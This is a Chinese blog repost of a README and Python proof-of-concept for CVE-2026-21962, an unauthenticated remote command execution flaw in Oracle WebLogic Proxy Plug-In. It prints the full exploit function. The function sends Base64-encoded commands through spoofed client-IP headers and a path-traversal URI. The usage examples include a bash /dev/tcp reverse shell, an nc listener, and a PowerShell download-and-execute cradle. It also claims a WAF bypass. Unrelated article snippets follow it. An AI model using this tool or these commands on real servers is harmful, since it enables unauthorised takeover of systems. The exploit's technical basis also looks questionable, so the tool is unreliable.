news 2026/1/26 4:34:23

CVE-2026-21962漏洞利用工具:Oracle WebLogic代理插件未授权RCE检测与利用

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
CVE-2026-21962漏洞利用工具:Oracle WebLogic代理插件未授权RCE检测与利用

CVE-2026-21962 - Oracle WebLogic Server Proxy Plug-In RCE

项目描述

该项目提供了一个针对Oracle WebLogic Server代理插件(Proxy Plug-In)中一个关键安全漏洞(CVE-2026-21962)的漏洞利用概念验证(PoC)脚本。该漏洞允许未经验证的远程攻击者通过HTTP协议在受影响的服务器上执行任意操作系统命令,风险等级极高(CVSS 10.0)。

影响组件

  • Oracle HTTP Server(版本12.2.1.4.0、14.1.1.0.0、14.1.2.0.0)
  • Oracle WebLogic Server代理插件(用于Apache HTTP Server和Microsoft IIS)

功能特性

核心功能

  • 自动漏洞检测:通过多种常见路径(/weblogic//wl_proxy//bea_wls_internal//_proxy//proxy/)探测目标系统是否存在漏洞
  • 远程命令执行:能够执行用户指定的任意操作系统命令
  • Payload编码:自动对Payload进行Base64编码,以绕过某些WAF/过滤器
  • 多种攻击向量:支持通过不同HTTP头(WL-Proxy-Client-IP、Proxy-Client-IP、X-Forwarded-For)注入Payload

高级特性

  • 跨平台支持:兼容Linux/Unix和Windows目标系统
  • 灵活Payload:支持执行简单命令、复杂Shell脚本或PowerShell命令
  • 输出解析:自动提取并显示命令执行结果
  • 错误处理:完善的异常处理和超时控制机制

检测能力

  • 支持通过HTTP状态码(200、302、500)判断漏洞存在性
  • 能够捕获并显示命令执行的输出结果
  • 提供详细的调试信息和错误报告

安装指南

环境要求

  • Python 3.x:确保系统已安装Python 3
  • 依赖库:需要安装requests
  • 操作系统:支持Linux、macOS和Windows

安装步骤

  1. 克隆或下载项目文件

    gitclone https://github.com/Ashwesker/Ashwesker-CVE-2026-21962.gitcdAshwesker-CVE-2026-21962
  2. 安装Python依赖

    pipinstallrequests
  3. 设置执行权限(可选)

    chmod+x CVE-2026-21962.py

验证安装

运行以下命令验证安装是否成功:

python3 CVE-2026-21962.py --help

如果看到帮助信息,说明安装成功。

使用说明

基础使用

基本语法
python3 CVE-2026-21962.py<target_url>"<command>"
参数说明
  • target_url:目标服务器的URL(例如:http://target:7001https://oracle-server:4443
  • command:要执行的命令(例如:idwhoami或反向Shell命令)

使用示例

1. 基本信息收集

执行系统命令来验证漏洞:

python3 CVE-2026-21962.py http://target:7001"id && whoami && uname -a"
2. 获取文件系统信息
python3 CVE-2026-21962.py http://target:7001"ls -la / && df -h"
3. 反向Shell(Linux目标)

首先在攻击机启动监听:

nc-lvnp4444

然后执行漏洞利用:

python3 CVE-2026-21962.py http://target:7001"bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"
4. Windows目标利用
python3 CVE-2026-21962.py https://oracle-server:4443"powershell -nop -c IEX (New-Object Net.WebClient).DownloadString('http://your-server/shell.ps1')"

输出说明

  • 成功迹象:HTTP状态码为200、302或500
  • 命令输出:如果命令有输出,会显示前1500个字符
  • 静默执行:如果命令执行成功但没有输出,会显示相应提示

注意事项

  1. 目标端口:通常WebLogic服务运行在7001端口,HTTPS服务可能运行在4443端口
  2. SSL证书:对于自签名证书的目标,可能需要禁用SSL验证
  3. 路径探测:工具会自动尝试多个常见代理插件路径
  4. WAF绕过:使用Base64编码和多种HTTP头尝试绕过防护

核心代码

主漏洞利用函数

defexploit(target_url,command):# 漏洞利用端点(常见代理插件路径)vuln_paths=["/weblogic/","/wl_proxy/","/bea_wls_internal/","/_proxy/","/proxy/"]# 构造触发反序列化/命令注入的恶意头部# 实际触发使用特制的WL-Proxy-Client-IP或类似头部# 结合绕过验证的特制URIpayload=f"cmd:{command}"# Base64编码Payload以绕过WAF/过滤器encoded_payload=base64.b64encode(payload.encode()).decode()# 构造恶意HTTP头部headers={"WL-Proxy-Client-IP":f"127.0.0.1;{encoded_payload}","Proxy-Client-IP":f"127.0.0.1;{encoded_payload}","X-Forwarded-For":f"127.0.0.1;{encoded_payload}","User-Agent":"Mozilla/5.0 (compatible; Exploit/1.0)","Accept":"*/*","Connection":"close"}# 触发插件漏洞的特制URIuri="/weblogic/..;/bea_wls_internal/ProxyServlet"# 尝试所有可能的漏洞路径forbase_pathinvuln_paths:full_url=f"{target_url.rstrip('/')}{base_path}{uri}"print(f"[*] 尝试路径:{full_url}")print(f"[*] 执行命令:{command}")try:# 使用GET请求,某些配置下POST也可用r=requests.get(full_url,headers=headers,timeout=12,verify=False,allow_redirects=False)# 根据HTTP状态码判断是否成功ifr.status_codein[200,302,500]:print(f"[+] 可能成功!状态码:{r.status_code}")ifr.text.strip():print("\n可能的命令输出/响应:\n"+"-"*60)print(r.text[:1500])# 显示前1500字符避免信息过多print("-"*60)else:print("[+] 命令静默执行(无输出)")returnTrueelse:print(f"[-] 状态码{r.status_code}- 此路径无漏洞")exceptExceptionase:print(f"[-] 路径{full_url}错误:{e}")print("\n[-] 所有路径测试完成 - 目标可能无漏洞或插件未暴露。")returnFalse

命令行参数解析

if__name__=="__main__":# 创建参数解析器parser=argparse.ArgumentParser(description="CVE-2026-21962 PoC - Oracle WebLogic Proxy Plug-In RCE")# 目标URL参数parser.add_argument("target",help="目标URL (例如 http://target:7001 或 https://oracle-server:4443)")# 命令参数parser.add_argument("cmd",help="要执行的命令 (例如 'id' 或 'whoami' 或 'powershell -c ...' 或 'bash -i >& /dev/tcp/攻击者IP/4444 0>&1')")# 解析参数并执行漏洞利用args=parser.parse_args()exploit(args.target,args.cmd)

漏洞检测逻辑

# 漏洞检测的核心逻辑# 1. 构造包含恶意命令的Payload# 2. 使用Base64编码绕过基本防护# 3. 通过多个HTTP头部字段注入Payload# 4. 使用路径遍历技术访问代理Servlet# 5. 分析响应判断漏洞是否存在# 关键点:# - 使用分号分隔IP地址和命令Payload# - 尝试多个可能的代理插件路径# - 支持HTTP和HTTPS协议# - 包含完善的超时和错误处理

安全注意事项

# 重要安全提示:# 1. 此工具仅用于授权的安全测试# 2. 在非授权系统上使用是非法的# 3. 使用前需获得明确书面授权# 4. 遵守所有适用法律法规# 技术建议:# 1. 及时应用Oracle 2026年1月关键补丁更新# 2. 限制对受影响服务的网络访问# 3. 监控HTTP流量中的可疑行为# 4. 定期审查系统日志和安全控制措施

版本兼容性

该工具设计用于以下受影响版本:

  • Oracle HTTP Server: 12.2.1.4.0, 14.1.1.0.0, 14.1.2.0.0
  • WebLogic Proxy Plug-in for Apache/IIS

免责声明: 所有PoC代码仅供道德、授权测试和教育目的使用。未经授权的利用是非法的,作者不承担任何滥用责任。
6HFtX5dABrKlqXeO5PUv/ydjQZDJ7Ct83xG1NG8fcAPtA7C84tFVwza9UVc8THXK
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/1/24 9:12:47

语音黑科技体验:CAM++如何判断两段声音是不是同一个人

语音黑科技体验&#xff1a;CAM如何判断两段声音是不是同一个人 你有没有过这样的经历&#xff1a;电话里听到一个熟悉的声音&#xff0c;却犹豫三秒才敢确认——“这真是老张吗&#xff1f;” 或者在智能门禁前&#xff0c;系统突然提示“声纹验证失败”&#xff0c;而你明明…

作者头像 李华
网站建设 2026/1/25 19:18:55

Qwen All-in-One知识蒸馏:未来压缩模型可行性分析

Qwen All-in-One知识蒸馏&#xff1a;未来压缩模型可行性分析 1. 什么是Qwen All-in-One&#xff1f;不是“多个小模型”&#xff0c;而是“一个聪明的模型” 你有没有遇到过这样的情况&#xff1a;想在一台老笔记本或者树莓派上跑点AI功能&#xff0c;结果发现光是装一个情感…

作者头像 李华
网站建设 2026/1/24 9:12:12

如何3天打造全平台数据采集系统?MediaCrawler实战指南

如何3天打造全平台数据采集系统&#xff1f;MediaCrawler实战指南 【免费下载链接】MediaCrawler-new 项目地址: https://gitcode.com/GitHub_Trending/me/MediaCrawler-new 当你需要分析竞品内容却被反爬机制阻挡&#xff0c;想要追踪热门话题却缺乏自动化工具&#x…

作者头像 李华
网站建设 2026/1/24 9:11:52

Keil添加文件零基础指南:快速理解工程结构

以下是对您提供的博文内容进行深度润色与结构重构后的专业级技术文章。全文已彻底去除AI腔调、模板化表达和刻板章节标题&#xff0c;代之以真实工程师口吻的逻辑流叙述&#xff0c;融合一线开发经验、踩坑教训与教学视角&#xff0c;语言简洁有力、节奏张弛有度&#xff0c;兼…

作者头像 李华
网站建设 2026/1/26 2:29:50

Edge-TTS服务连接错误与API访问限制深度解决方案

Edge-TTS服务连接错误与API访问限制深度解决方案 【免费下载链接】edge-tts Use Microsoft Edges online text-to-speech service from Python WITHOUT needing Microsoft Edge or Windows or an API key 项目地址: https://gitcode.com/GitHub_Trending/ed/edge-tts 在…

作者头像 李华
网站建设 2026/1/24 9:11:47

IQuest-Coder-V1实战案例:竞赛编程自动解题系统搭建步骤

IQuest-Coder-V1实战案例&#xff1a;竞赛编程自动解题系统搭建步骤 1. 为什么需要一个“会做题”的编程模型&#xff1f; 你有没有过这样的经历&#xff1a;看到一道算法题&#xff0c;思路卡在某个边界条件上&#xff0c;调试半小时还是报错&#xff1b;或者比赛倒计时只剩…

作者头像 李华